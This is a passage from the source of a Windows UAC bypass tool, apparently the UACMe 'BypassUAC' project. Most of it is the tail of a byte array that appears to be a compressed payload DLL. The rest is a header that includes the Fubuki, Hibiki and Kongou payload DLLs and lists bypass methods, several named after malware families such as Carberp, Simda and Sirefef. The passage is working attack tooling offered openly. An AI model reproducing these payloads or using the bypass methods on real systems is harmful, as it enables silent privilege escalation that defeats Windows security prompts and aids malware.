100 | 	0x5C, 0x64, 0xA3, 0x03, 0x26, 0x2F, 0xEB, 0x37, 0xE6, 0xA8, 0x99, 0x1F, 0x67, 0xEE, 0x9D, 0x7C,
101 | 	0xC4, 0xEA, 0x7B, 0xC1, 0x77, 0x8E, 0x77, 0xE8, 0x71, 0xC0, 0xB0, 0x86, 0x77, 0x36, 0x0D, 0x93,
102 | 	0x4B, 0x54, 0xCE, 0xE6, 0x56, 0x4A, 0xB9, 0x33, 0x15, 0x1C, 0x9B, 0x1B, 0x15, 0xCE, 0xEB, 0x8A,
103 | 	0x75, 0x8B, 0x41, 0xA3, 0x69, 0x8E, 0xB0, 0x35, 0x70, 0x81, 0xB1, 0x00, 0x06, 0x23, 0xBC, 0x18,
104 | 	0x4B, 0x54, 0xC9, 0xB9, 0x52, 0x3C, 0x98, 0x5E, 0xD6, 0xCE, 0xF6, 0x03, 0x64, 0xBA, 0x9D, 0x28,
105 | 	0x51, 0x18, 0xDA, 0xD0, 0x47, 0xF9, 0x1D, 0x0B, 0x70, 0xD2, 0x63, 0x91, 0x02, 0xF7, 0x0E, 0x7A,
106 | 	0x32, 0x09, 0xD9, 0x9A, 0x08, 0x9C, 0x9B, 0xCD, 0x1E, 0xFC, 0x99, 0x22, 0x66, 0xF1, 0x9D, 0x25,
107 | 	0x75, 0xF7, 0xD0, 0xBC, 0x46, 0x91, 0x1D, 0xC7, 0x6F, 0xE1, 0xDF, 0x80, 0x1C, 0x07, 0x13, 0x18,
108 | 	0x2D, 0x65, 0xD6, 0x92, 0x39, 0x4D, 0x86, 0x32, 0x79, 0xD3, 0x98, 0x2C, 0x66, 0xD1, 0x9C, 0x25,
109 | 	0x75, 0xFD, 0xD0, 0xA2, 0x53, 0x89, 0x1C, 0x38, 0x64, 0xD4, 0xE2, 0x81, 0x17, 0x07, 0x10, 0x59,
110 | 	0x32, 0x6C, 0xB9, 0x94, 0x46, 0x4A, 0xA9, 0xAA, 0x67, 0xCC, 0x83, 0x34, 0x67, 0xD4, 0xE9, 0xD9,
111 | 	0x74, 0xF2, 0xD1, 0x97, 0xA5, 0x8E, 0x06, 0x39, 0x90, 0xE0, 0xCB, 0xF6, 0x72, 0x9C, 0x08, 0x1A,
112 | 	0x87, 0xFB, 0x35, 0xD3, 0x81, 0x0C, 0xD0, 0x03, 0x7F, 0xCC, 0xD8, 0x01, 0x67, 0xC6, 0xBE, 0x3A,
113 | 	0x74, 0x38, 0xE1, 0xA3, 0xDF, 0x75, 0xDD, 0x90, 0xB0, 0x89, 0xC0, 0xBE, 0x03, 0xC5, 0x97, 0x66,
114 | 	0x33, 0x1B, 0xC8, 0xAC, 0x24, 0x33, 0xA6, 0x31, 0x59, 0xCE, 0xA6, 0x31, 0x58, 0xCC, 0xA2, 0x38,
115 | 	0x4B, 0xEA, 0xE7, 0xA1, 0x4E, 0xDE, 0x39, 0x38, 0x70, 0xC0, 0xF0, 0x81, 0x35, 0x36, 0x0C, 0x59,
116 | 	0x67, 0x54, 0xC9, 0xD9, 0x16, 0x4C, 0xFC, 0x03, 0x66, 0x4D, 0xA9, 0x33, 0xFB, 0x9B, 0xAD, 0x3A,
117 | 	0xDB, 0xD8, 0xD1, 0x67, 0x77, 0x8E, 0xCA, 0x08, 0x70, 0x0A, 0xC5, 0xB1, 0x03, 0xF9, 0x3C, 0x19,
118 | 	0x22, 0x42, 0xC9, 0x93, 0x01, 0x19, 0xA9, 0x33, 0x5E, 0xFC, 0x99, 0x61, 0x57, 0xCE, 0xF5, 0x0A,
119 | 	0x74, 0x68, 0x84, 0x93, 0x47, 0x18, 0x2C, 0x38, 0xDB, 0xD0, 0xC0, 0x39, 0x33, 0x06, 0xC2, 0x0C,
120 | 	0x02, 0x64, 0x2A, 0xA3, 0x26, 0xB2, 0xA9, 0x33, 0x74, 0xEB, 0x99, 0x67, 0x67, 0xE6, 0xAD, 0x3A,
121 | 	0x4E, 0xD8, 0xD1, 0xF3, 0x77, 0x8E, 0x7D, 0x6D, 0x40, 0xE0, 0xB3, 0xB1, 0x03, 0x8F, 0x3C, 0x19,
122 | 	0xA8, 0x54, 0xC9, 0x3B, 0x73, 0x7C, 0x99, 0x8E, 0x56, 0xCC, 0x40, 0x03, 0x67, 0x22, 0xAD, 0x3A,
123 | 	0x70, 0xB8, 0xF9, 0xA3, 0x47, 0x99, 0x2C, 0x38, 0x42, 0xD0, 0xC0, 0xC7, 0x56, 0x36, 0x0C, 0x42,
124 | 	0x02, 0x64, 0xBF, 0xA3, 0x26, 0xDC, 0xA9, 0x33, 0xFA, 0x99, 0xA9, 0x33, 0xD5, 0xFE, 0x9D, 0xFA,
125 | 	0x44, 0xE8, 0x0A, 0x93, 0x47, 0x63, 0xB1, 0x08, 0x70, 0xE1, 0x72, 0xC3, 0xF2, 0xB3, 0x0F, 0x69,
126 | 	0xFB, 0x61, 0xE9, 0x30, 0x86, 0x4B, 0x99, 0x3B, 0x66, 0xC5, 0x29, 0x04, 0x6C, 0x2E, 0x35, 0x1A,
127 | 	0x79, 0xE8, 0xDF, 0xA3, 0x48, 0x2E, 0x06, 0x29, 0x70, 0xE8, 0xD2, 0x81, 0x10, 0x26, 0xAB, 0x0C,
128 | 	0x32, 0x72, 0xC9, 0x91, 0x31, 0x7C, 0x2D, 0x2A, 0x66, 0xD6, 0x99, 0x28, 0x67, 0x4E, 0x81, 0x3A,
129 | 	0x69, 0xE8, 0xCF, 0xA3, 0x58, 0xDE, 0x20, 0xB8, 0x51, 0xE0, 0xE2, 0x81, 0x20, 0x06, 0x28, 0x29,
130 | 	0x0B, 0x64, 0xEF, 0x93, 0x01, 0x4C, 0xB1, 0x33, 0x4F, 0xCC, 0x91, 0x19, 0x67, 0xE5, 0xAD, 0x05,
131 | 	0x59, 0xE8, 0xFF, 0xA3, 0x47, 0xA1, 0x1C, 0x08, 0x70, 0xD1, 0xC0, 0xC7, 0x76, 0x06, 0x6E, 0x6C,
132 | 	0x59, 0x0D, 0xFF, 0xA7, 0x08, 0x28, 0x99, 0x5F, 0x0A, 0xCC, 0xDA, 0x52, 0x0B, 0xA2, 0xD3, 0x3A,
133 | 	0x00, 0xB8, 0xBE, 0xD4, 0x22, 0xFC, 0x55, 0x56, 0x70, 0x86, 0xAF, 0xF3, 0x6E, 0x67, 0x78, 0x70,
134 | 	0x5D, 0x64, 0xA7, 0x93, 0x65, 0x23, 0xF7, 0x40, 0x12, 0xBE, 0x99, 0x46, 0x04, 0xBA, 0xCD, 0x5B,
135 | 	0x06, 0x9C, 0xB8, 0xA3, 0x26, 0xE2, 0x51, 0x4B, 0x17, 0xB6, 0x97, 0x81, 0x03, 0x45, 0x7E, 0x7C,
136 | 	0x53, 0x10, 0xAC, 0xC6, 0x54, 0x4C, 0xF0, 0x33, 0x25, 0xB9, 0xEB, 0x41, 0x02, 0xA0, 0x9D, 0x4E,
137 | 	0x3D, 0xB8, 0xD1, 0xE7, 0x22, 0xF8, 0x53, 0xB4, 0x12, 0x8A, 0x53, 0x80, 0xB3, 0x06, 0x65, 0x7A,
138 | 	0x57, 0x15, 0xCD, 0x03, 0x6A, 0x25, 0xEA, 0x47, 0xC2, 0xCD, 0xDD, 0x56, 0xF7, 0xCA, 0x91, 0x55,
139 | 	0x0D, 0x57, 0xD0, 0xC3, 0x44, 0xCB, 0x72, 0x4D, 0x1D, 0xE1, 0x45, 0x80, 0x77, 0x63, 0x7E, 0x7F,
140 | 	0x53, 0x07, 0xAC, 0x91, 0x55, 0x28, 0x9A, 0x74, 0x03, 0xB8, 0xDA, 0x5F, 0x06, 0xC2, 0xEE, 0x49,
141 | 	0x94, 0xE9, 0xF4, 0xA2, 0x08, 0xFE, 0x79, 0x56, 0x71, 0x35, 0xC2, 0xE7, 0x6C, 0x06, 0x48, 0x75,
142 | 	0x5E, 0x36, 0xCD, 0xF6, 0x41, 0xCC, 0x9F, 0x56, 0x14, 0x9F, 0xFC, 0x41, 0x67, 0xB8, 0xF8, 0x48,
143 | 	0x74, 0xAF, 0xB4, 0xCD, 0x22, 0x9C, 0x6E, 0x28, 0x7A, 0xA1, 0xA3, 0xC0, 0x0F, 0x57, 0x79, 0x7C,
144 | 	0x32, 0x11, 0xAC, 0x93, 0x68, 0x29, 0xED, 0x72, 0x16, 0xCC, 0xF0, 0x71, 0x12, 0xA8, 0xFB, 0x5F,
145 | 	0x06, 0xA9, 0xE1, 0xCF, 0x2B, 0xE1, 0x7F, 0xC8, 0x71, 0xAA, 0xC1, 0xC7, 0x71, 0x34, 0x69, 0x42,
146 | 	0x30, 0x36, 0xAC, 0xA3, 0x37, 0x33, 0x9B, 0x60, 0x0F, 0xCE, 0xE3, 0x41, 0x65, 0x9C, 0xF8, 0x57,
147 | 	0x1B, 0x9C, 0xB4, 0x83, 0x04, 0xE1, 0x71, 0x48, 0x05, 0xC0, 0xCB, 0xD2, 0x76, 0x46, 0x7C, 0x69,
148 | 	0x5D, 0x16, 0xBD, 0xE0, 0x07, 0x49, 0xF8, 0xBB, 0x16, 0xA5, 0xE9, 0xBC, 0x61, 0xBE, 0xD4, 0x49,
149 | 	0xB1, 0xEA, 0xD1, 0xED, 0x26, 0xE3, 0x79, 0x6E, 0x11, 0x8C, 0xA9, 0x87, 0x67, 0xD7, 0x0E, 0x69,
150 | 	0x33, 0x20, 0xA6, 0xFE, 0x47, 0x25, 0x1B, 0x5D, 0x3B, 0xCD, 0xDE, 0x41, 0x08, 0xBB, 0xED, 0x77,
151 | 	0x75, 0xE7, 0x82, 0xA4, 0x33, 0x8D, 0xDF, 0x38, 0x5D, 0xE2, 0x93, 0xE9, 0x62, 0x74, 0xEE, 0x7C,
152 | 	0x7F, 0x65, 0x9C, 0xFD, 0x45, 0x93, 0x9E, 0x03, 0x77, 0x1C, 0x9E, 0x63, 0x32, 0xBD, 0xF8, 0x48,
153 | 	0x9F, 0xEA, 0xA6, 0xC2, 0x5C, 0xCD, 0xDC, 0x59, 0x1E, 0x8F, 0xAE, 0xE8, 0x60, 0x66, 0x06, 0xEA,
154 | 	0x3C, 0xC6, 0xB9, 0xC1, 0x27, 0x18, 0xEB, 0x52, 0x76, 0xDA, 0xEA, 0x21, 0x77, 0x32, 0xED, 0x4D,
155 | 	0x15, 0xEB, 0xAE, 0xA1, 0x15, 0x8F, 0x6C, 0x29, 0x10, 0xE8, 0x42, 0x8B, 0x04, 0x64, 0x0E, 0xEB,
156 | 	0x3C, 0x50, 0xDE, 0xE3, 0x51, 0x1C, 0xF8, 0x47, 0x78, 0xA4, 0x16, 0x30, 0x35, 0xCF, 0x14, 0x39,
157 | 	0x75, 0xE9, 0x85, 0xDA, 0x37, 0x92, 0x79, 0x38, 0xF2, 0xC9, 0x60, 0xA1, 0x12, 0x1B, 0x7A, 0x7C,
158 | 	0x61, 0x74, 0xAA, 0xFB, 0x43, 0x21, 0xD9, 0x32, 0x14, 0xA5, 0xEF, 0x92, 0x77, 0xCB, 0xDE, 0x55,
159 | 	0x3D, 0x86, 0xC1, 0xBB, 0x29, 0x0E, 0x3E, 0x18, 0x1F, 0x8D, 0xA2, 0xE8, 0x6D, 0x84, 0x25, 0x49,
160 | 	0x40, 0x2E, 0xA6, 0xA3, 0x02, 0x3F, 0x80, 0x13, 0x35, 0x80, 0x99, 0x37, 0x30, 0x8E, 0xF4, 0x54,
161 | 	0x10, 0x87, 0xA6, 0xD0, 0x72, 0xA0, 0x4F, 0x8D, 0x70, 0x89, 0xAF, 0xEF, 0x03, 0x51, 0x68, 0x6A,
162 | 	0x73, 0x64, 0xAB, 0xFC, 0x54, 0x38, 0xDB, 0x5F, 0x07, 0xAF, 0xD9, 0x58, 0x05, 0xA1, 0xFC, 0x48,
163 | 	0x10, 0xF8, 0x41, 0xEA, 0xC7, 0xFA, 0x79, 0x55, 0x35, 0x8E, 0xB5, 0xEC, 0x02, 0x6E, 0x4C, 0x5A,
164 | 	0x40, 0x01, 0xA8, 0xE7, 0x43, 0x47, 0x21, 0x77, 0xA6, 0xA9, 0xEA, 0x47, 0x15, 0xA1, 0xE4, 0x31,
165 | 	0x5C, 0xE9, 0xB1, 0x73, 0x01, 0xE7, 0x6E, 0x4B, 0x78, 0x54, 0x89, 0x81, 0x8D, 0x07, 0x8A, 0x08,
166 | 	0x33, 0x50, 0x87, 0xF6, 0x5E, 0x5C, 0xAB, 0x75, 0x14, 0xA9, 0xB9, 0x56, 0x23, 0xAF, 0xE9, 0x5B,
167 | 	0x75, 0xCD, 0x96, 0xC6, 0x06, 0x86, 0x3C, 0x6E, 0x11, 0x8C, 0xB5, 0xE4, 0x02, 0x13, 0x45, 0x19,
168 | 	0x5C, 0x0D, 0xBD, 0xFA, 0x47, 0x20, 0xF0, 0x49, 0x67, 0xCF, 0x94, 0x40, 0x23, 0xA7, 0xFC, 0x5D,
169 | 	0x1A, 0x87, 0xD1, 0xD0, 0x33, 0xE7, 0x7F, 0x75, 0x1F, 0x84, 0xA5, 0xC1, 0x46, 0x68, 0x6D, 0x7B,
170 | 	0x5E, 0x01, 0xCB, 0x50, 0x75, 0x4C, 0xFC, 0x47, 0x27, 0xBF, 0xEA, 0x56, 0x15, 0xBA, 0xFD, 0x7C,
171 | 	0x18, 0x89, 0xB6, 0xD0, 0x46, 0xB4, 0x1C, 0x29, 0x05, 0xE0, 0xB0, 0xCD, 0x6C, 0x61, 0x41, 0x7C,
172 | 	0x41, 0x17, 0xD9, 0xF2, 0x41, 0x29, 0xCE, 0x32, 0x75, 0x98, 0xFC, 0x41, 0x6F, 0xA3, 0xF4, 0x54,
173 | 	0xF4, 0x80, 0xD1, 0xA3, 0x47, 0xF6, 0x1A, 0x11, 0x70, 0xE2, 0xC4, 0x80, 0x67, 0x2C, 0x0C, 0x19,
174 | 	0x1A, 0x34, 0xE9, 0x93, 0x26, 0x1C, 0x11, 0x3A, 0xD2, 0x4C, 0x90, 0x33, 0xD0, 0x4E, 0x94, 0xBD,
175 | 	0x66, 0x63, 0xD5, 0x35, 0xC6, 0x81, 0x1C, 0x31, 0xF6, 0x64, 0xC3, 0xDB, 0x71, 0x82, 0x0F, 0xBF,
176 | 	0xB6, 0x67, 0x4C, 0x85, 0x00, 0xC8, 0x9E, 0x01, 0x33, 0x48, 0x9A, 0x2B, 0xE3, 0xCD, 0xCF, 0xBE,
177 | 	0x77, 0xEA, 0x55, 0xA0, 0xA1, 0x5B, 0x98, 0x05, 0xAA, 0x64, 0xC3, 0xC1, 0x87, 0x0D, 0xC4, 0x9D,
178 | 	0x35, 0xE1, 0xEE, 0x97, 0xE3, 0x4E, 0x99, 0xA6, 0x35, 0xB8, 0xF8, 0x41, 0x13, 0xCE, 0xE8, 0x4A,
179 | 	0x3D, 0x86, 0xB7, 0xCC, 0x10, 0x8E, 0x5C, 0x04, 0x73, 0xA8, 0xA5, 0xE0, 0x73, 0x07, 0xAA, 0x19,
180 | 	0x32, 0x64, 0x92, 0x92, 0x63, 0x34, 0xE9, 0x52, 0x08, 0xCC, 0xFD, 0x76, 0x09, 0xB8, 0xF4, 0x48,
181 | 	0x1B, 0x86, 0xD1, 0xCE, 0x22, 0xE0, 0x68, 0x6B, 0x04, 0x92, 0xA9, 0x81, 0x6D, 0x61, 0x7F, 0x4E,
182 | 	0x32, 0x99, 0xCA, 0xDC, 0x26, 0x39, 0xED, 0x43, 0x13, 0xB8, 0xDD, 0x56, 0x05, 0xCA, 0xE8, 0x5D,
183 | 	0x37, 0xED, 0x86, 0xA3, 0x47, 0xF1, 0x1C, 0x78, 0x33, 0x8C, 0xAF, 0xF2, 0x66, 0x4E, 0x0C, 0x14,
184 | 	0x5E, 0x6C, 0xAC, 0x93, 0x1E, 0x8E, 0x8B, 0x72, 0x0A, 0xA0, 0xF6, 0x3B, 0x04, 0xCE, 0xCA, 0xFA,
185 | 	0x66, 0x81, 0xA5, 0xF3, 0x35, 0x6A, 0x73, 0x5B, 0xF0, 0xB0, 0xC0, 0x28, 0xC2, 0x1B, 0x08, 0x1A,
186 | 	0xF3, 0x7F, 0xB9, 0x93, 0x26, 0x97, 0x99, 0xB0, 0xE1, 0xC8, 0x9C, 0xF3, 0x75, 0x85, 0x9D, 0x7F,
187 | 	0x26, 0xA6, 0x94, 0xEF, 0x74, 0xBC, 0x32, 0x38, 0x14, 0x8C, 0xAC, 0x81, 0x03, 0x94, 0x0E, 0x4B,
188 | 	0xB2, 0x01, 0xAE, 0xC2, 0x53, 0x29, 0xEB, 0x4A, 0xA4, 0xBF, 0x8D, 0x76, 0x1F, 0x8E, 0x95, 0xBF,
189 | 	0xB5, 0xEC, 0x9E, 0xD3, 0x22, 0xDE, 0x72, 0x73, 0x15, 0x99, 0xC1, 0x85, 0x6B, 0xC7, 0x0F, 0x5D,
190 | 	0x12, 0x01, 0xA5, 0xF6, 0x52, 0x29, 0xD9, 0x37, 0x31, 0xCC, 0x97, 0x67, 0xA6, 0xCD, 0x9F, 0x1E,
191 | 	0xF4, 0xEB, 0xD1, 0xE2, 0x03, 0xD8, 0xE4, 0x79, 0x20, 0xA9, 0x05, 0x92, 0x46, 0x46, 0xF3, 0x18,
192 | 	0x4D, 0x74, 0xB6, 0x83, 0x25, 0x33, 0x89, 0x58, 0x76, 0xC8, 0x89, 0x33, 0x67, 0x75, 0x8C, 0xBA,
193 | 	0x74, 0xE8, 0x65, 0x81, 0x47, 0x8E, 0xA0, 0xD8, 0x70, 0x00, 0x88, 0x92, 0x03, 0x06, 0xC4, 0x79,
194 | 	0x33, 0xDB, 0xC1, 0xAC, 0x22, 0xB3, 0xA6, 0x37, 0x59, 0xC8, 0xA6, 0x37, 0x58, 0xCA, 0xA2, 0x3E,
195 | 	0x4B, 0xEC, 0xEE, 0xA7, 0x78, 0x8A, 0x83, 0x07, 0x74, 0xDF, 0xC4, 0xBE, 0x07, 0x39, 0x08, 0x2E,
196 | 	0x36, 0x66, 0xC9, 0x53, 0x67, 0x45, 0x58, 0xA8, 0xE6, 0xD4, 0x19, 0x37, 0x5F, 0xCE, 0x9D, 0xBA,
197 | 	0x25, 0x83, 0xD4, 0xA2, 0x47, 0x8F, 0x1C, 0x3A, 0x20, 0x10, 0xC2, 0x83, 0x66, 0xE6, 0x0E, 0x71,
198 | 	0xC2, 0x66, 0xC0, 0x97, 0xA8, 0x4E, 0xB9, 0x36, 0x67, 0xC6, 0x99, 0xD2, 0x65, 0x5E, 0xBD, 0x3B,
199 | 	0xD4, 0xA8, 0xD1, 0xA3, 0x49, 0x4E, 0x9D, 0x3F, 0x10, 0xE1, 0x81, 0x81, 0x63, 0x45, 0x0C, 0x19,
200 | 	0x74, 0x19, 0x48, 0x9F, 0xC2, 0x4D, 0x59, 0x31, 0x52, 0xEC, 0x98, 0x65, 0x67, 0xCE, 0xCE, 0x3A,
201 | 	0x2B, 0xE8, 0x87, 0xA3, 0x02, 0x8A, 0x1C, 0x6A, 0x50, 0xE1, 0x89, 0x81, 0x4C, 0x06, 0x42, 0x2C,
202 | 	0xD2, 0x65, 0x80, 0x33, 0x26, 0x0A, 0xF9, 0x32, 0x27, 0xC9, 0x24, 0x37, 0x8F, 0x21, 0x63, 0x3A,
203 | 	0xD4, 0xFB, 0xD8, 0x81, 0x53, 0x6E, 0x17, 0xDC, 0x70, 0x86, 0xFF, 0x00, 0x00, 0x64, 0x0C, 0x1D,
204 | 	0x32, 0xAC, 0xC5, 0xB1, 0x24, 0x6C, 0x9C, 0x33, 0x64, 0xCD, 0x79, 0x3A, 0x13, 0xCE, 0xEF, 0x3A,
205 | 	0x1D, 0xA8, 0xD1, 0xCD, 0x47, 0xE9, 0x1C, 0x7E, 0x90, 0xE0, 0xAC, 0x91, 0x03, 0x63, 0x0C, 0x50,
206 | 	0x92, 0x65, 0xAF, 0x93, 0x49, 0x49, 0x39, 0x37, 0x9A, 0xAC, 0x88, 0x32, 0x67, 0xFE, 0x9D, 0x0E,
207 | 	0x61, 0x88, 0xD1, 0x9A, 0xA5, 0x8E, 0x7E, 0x98, 0x70, 0xE0, 0xC0, 0xB3, 0x09, 0x06, 0x2D, 0x14,
208 | 	0x71, 0x04, 0xCD, 0xFE, 0x26, 0x3C, 0x99, 0xB9, 0x07, 0x2C, 0x9C, 0x4A, 0xC7, 0xDF, 0xFC, 0x3A,
209 | 	0x19, 0x48, 0xD6, 0xE2, 0xC6, 0x85, 0x49, 0x38, 0x37, 0xE0, 0xE0, 0xA1, 0x01, 0x69, 0x15, 0x79,
210 | 	0x39, 0x10, 0xC9, 0xB3, 0x05, 0xCC, 0x9B, 0x7B, 0x66, 0xDC, 0x12, 0x93, 0x75, 0xAB, 0x91, 0x7E,
211 | 	0x54, 0xED, 0xA2, 0xA3, 0x24, 0xEC, 0x13, 0x50, 0x00, 0xE0, 0xB4, 0xA1, 0x0C, 0x69, 0xAC, 0x11,
212 | 	0x51, 0x63, 0x88, 0xC3, 0x26, 0x0F, 0x99, 0x7E, 0x86, 0xCF, 0xB9, 0x53, 0x6C, 0xBC, 0x8C, 0x5A,
213 | 	0x78, 0x90, 0xD1, 0xDA, 0xE7, 0x87, 0x58, 0x38, 0x3C, 0xB5, 0xE0, 0x81, 0x03, 0xE6, 0x03, 0x11,
214 | 	0xDA, 0x6C, 0x9F, 0x73, 0x22, 0x3E, 0x9D, 0x33, 0x15, 0x24, 0x9E, 0x02, 0x67, 0xE0, 0x9D, 0x03,
215 | 	0xFF, 0x88, 0xD1, 0x42, 0x47, 0xBE, 0x1C, 0x32, 0x5E, 0xE0, 0xC7, 0x61, 0x06, 0x53, 0x6D, 0x03,
216 | 	0x46, 0x06, 0xCC, 0xFD, 0xC6, 0x59, 0xF5, 0x9B, 0x73, 0x8A, 0x49, 0x33, 0x12, 0xCE, 0xFF, 0x0A,
217 | 	0x74, 0x83, 0xE1, 0xA7, 0xB6, 0x89, 0xB4, 0x50, 0x70, 0xC2, 0x30, 0x83, 0x4F, 0xB6, 0x0E, 0x7E,
218 | 	0xA0, 0x66, 0x64, 0xC2, 0x28, 0x3C, 0x89, 0x3B, 0x37, 0xDE, 0xFE, 0x83, 0x6B, 0xBA, 0xDD, 0x38,
219 | 	0x25, 0xD7, 0xD0, 0x83, 0x47, 0xA6, 0x4C, 0x33, 0x59, 0x90, 0xCA, 0xB3, 0x46, 0x16, 0x06, 0x28,
220 | 	0x22, 0x77, 0xE9, 0x93, 0x0B, 0x3C, 0x8B, 0x03, 0x56, 0xCC, 0xA8, 0x33, 0x52, 0x9E, 0x9C, 0x25,
221 | 	0x65, 0xD6, 0xD1, 0x49, 0x4C, 0xFE, 0x1A, 0x77, 0x62, 0xF0, 0xA7, 0x31, 0x04, 0x75, 0x05, 0xEC,
222 | 	0x23, 0x63, 0x18, 0x93, 0xF5, 0x58, 0x60, 0x3A, 0x48, 0xCC, 0xFD, 0x33, 0x0B, 0x6D, 0x8D, 0x3A,
223 | 	0x05, 0xE2, 0xFD, 0xA3, 0x41, 0x7E, 0x1F, 0x68, 0x80, 0xE3, 0xEA, 0xEE, 0x53, 0x07, 0x79, 0xA9,
224 | 	0x26, 0x10, 0x91, 0x9E, 0x26, 0x4C, 0x6D, 0x66, 0x66, 0xB9, 0x8D, 0x33, 0xB7, 0xC6, 0xAC, 0x29,
225 | 	0xCF, 0xEA, 0x4C, 0xB0, 0x92, 0xF3, 0x0F, 0x7C, 0x30, 0xE6, 0xC1, 0xD1, 0x24, 0x67, 0x1C, 0x1F,
226 | 	0x67, 0x6D, 0xE8, 0x04, 0x07, 0x4C, 0x99, 0x17, 0x66, 0x0C, 0xB4, 0x33, 0x33, 0xE5, 0x4D, 0x3B,
227 | 	0x85, 0xF7, 0xA2, 0xF3, 0x4E, 0xEF, 0x66, 0x24, 0x79, 0xE4, 0xC0, 0x31, 0x07, 0x3A, 0x33, 0x61,
228 | 	0x5F, 0x08, 0xE9, 0x83, 0x50, 0x29, 0xEB, 0x40, 0xF6, 0x5A, 0xA4, 0x14, 0x56, 0xCE, 0xB3, 0x0A,
229 | 	0x53, 0xC8, 0xB4, 0xCD, 0x24, 0xE1, 0x1E, 0x5C, 0xB0, 0x97, 0xFD, 0xA6, 0x56, 0x52, 0x4A, 0x34,
230 | 	0x12, 0x5C, 0xEE, 0xB3, 0x55, 0x38, 0xF9, 0x45, 0x07, 0xA0, 0x99, 0x5C, 0x09, 0xAB, 0xA0, 0x1D,
231 | 	0x0D, 0x8D, 0xA2, 0x23, 0x60, 0xB1, 0x22, 0x35, 0x7A, 0xDC, 0xA1, 0x01, 0x88, 0x26, 0x61, 0x7B,
232 | 	0x5E, 0x1D, 0xE9, 0x93, 0x22, 0x22, 0xEA, 0x33, 0x5B, 0xEB, 0xEC, 0x41, 0x09, 0xF4, 0xEE, 0x59,
233 | 	0x74, 0x80, 0xB4, 0xCE, 0x26, 0xFD, 0x31, 0x55, 0x19, 0xE0, 0xA3, 0xF3, 0x6C, 0x75, 0x63, 0x7F,
234 | 	0x46, 0x49, 0xC9, 0xF0, 0x49, 0x21, 0xA3, 0x52, 0x15, 0xA1, 0xB7, 0x33, 0x11, 0xFF, 0xBA, 0x1A,
235 | 	0x19, 0x89, 0xBF, 0xCA, 0x27, 0xE8, 0x79, 0x4B, 0x04, 0xB6, 0x19, 0x87, 0xA3, 0x02, 0x2C, 0x99,
236 | 	0x12, 0x58, 0xBD, 0xE1, 0x53, 0x3F, 0xED, 0x42, 0xE7, 0x01, 0x4D, 0x37, 0x45, 0x11, 0x99, 0xE0,
237 | 	0x70, 0xDB, 0xF3, 0xD1, 0x44, 0x1E, 0x1F, 0x38, 0x03, 0x85, 0xA3, 0xF4, 0x71, 0x6F, 0x78, 0x60,
238 | 	0x71, 0x90, 0xC9, 0x83, 0x27, 0x3E, 0xFC, 0x42, 0x13, 0x9C, 0x9F, 0x56, 0x67, 0xAA, 0xCD, 0x48,
239 | 	0x1D, 0x9E, 0xB8, 0xCF, 0x22, 0x16, 0x7B, 0x5D, 0x03, 0x26, 0xC1, 0x68, 0x02, 0x43, 0x74, 0xB9,
240 | 	0x31, 0x66, 0xBD, 0xF3, 0x29, 0x00, 0xFC, 0x45, 0x03, 0xA0, 0xB9, 0x31, 0x0B, 0x9F, 0x9D, 0x07,
241 | 	0x53, 0x89, 0xA2, 0xEA, 0x29, 0x8E, 0x6A, 0x57, 0x1B, 0x85, 0xB2, 0xA6, 0x23, 0x73, 0x04, 0x70,
242 | 	0x73, 0x07, 0x88, 0x17, 0x1B, 0x6B, 0xFF, 0x52, 0x26, 0xA0, 0xEA, 0x56, 0x40, 0xEE, 0xB2, 0x7D,
243 | 	0x72, 0xC7, 0x42, 0xFC, 0x41, 0xDB, 0x1A, 0x04, 0x5F, 0xDA, 0xC9, 0xBD, 0x2C, 0xC0, 0x01, 0xE0,
244 | 	0xD2, 0x67, 0xF5, 0xBC, 0x53, 0x5F, 0x59, 0x33, 0x27, 0xEE, 0xA6, 0x33, 0x78, 0xCF, 0x62, 0x25,
245 | 	0x75, 0xF7, 0xD0, 0xBC, 0x46, 0x91, 0x1D, 0x27, 0x71, 0xFF, 0xC1, 0x9E, 0x02, 0x19, 0x0D, 0x26,
246 | 	0x2D, 0x65, 0xD6, 0x92, 0x39, 0x4D, 0x86, 0x32, 0x79, 0xCD, 0x87, 0x32
247 | };
248 | 


--------------------------------------------------------------------------------
/BypassUAC/global.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  TITLE:       GLOBAL.H
 4 | *
 5 | *  VERSION:     2.01
 6 | *
 7 | *  DATE:        04 Jan 2016
 8 | *
 9 | *  Common header file for the program support routines.
10 | *
11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
14 | * PARTICULAR PURPOSE.
15 | *
16 | *******************************************************************************/
17 | #pragma once
18 | 
19 | //disable nonmeaningful warnings.
20 | #pragma warning(disable: 4005) // macro redefinition
21 | #pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
22 | #pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
23 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
24 | #pragma warning(disable: 6102) // Using %s from failed function call at line %u
25 | #pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
26 | 
27 | #define GENERATE_COMPRESSED_PAYLOAD
28 | #ifndef _DEBUG
29 | #undef GENERATE_COMPRESSED_PAYLOAD
30 | #endif
31 | 
32 | #ifdef _WIN64
33 | #include "fubuki64comp.h"
34 | #include "hibiki64comp.h"
35 | #include "kongou64comp.h"
36 | #define FUBUKIDLL Fubuki64Comp
37 | #define HIBIKIDLL Hibiki64Comp
38 | #define KONGOUDLL Kongou64Comp
39 | #else
40 | #include "fubuki32comp.h"
41 | #include "hibiki32comp.h"
42 | #include "kongou32comp.h"
43 | #define FUBUKIDLL Fubuki32Comp
44 | #define HIBIKIDLL Hibiki32Comp
45 | #define KONGOUDLL Kongou32Comp
46 | #endif
47 | 
48 | typedef enum _UACBYPASSMETHOD {
49 | 	UacMethodSysprep1 = 1,
50 | 	UacMethodSysprep2,
51 | 	UacMethodOobe,
52 | 	UacMethodRedirectExe,
53 | 	UacMethodSimda,
54 | 	UacMethodCarberp1,
55 | 	UacMethodCarberp2,
56 | 	UacMethodTilon,
57 | 	UacMethodAVrf,
58 | 	UacMethodWinsat,
59 | 	UacMethodShimPatch,
60 | 	UacMethodSysprep3,
61 | 	UacMethodMMC,
62 | 	UacMethodSirefef,
63 | 	UacMethodGeneric,
64 | 	UacMethodGWX,
65 | 	UacMethodMax
66 | } UACBYPASSMETHOD;
67 | 
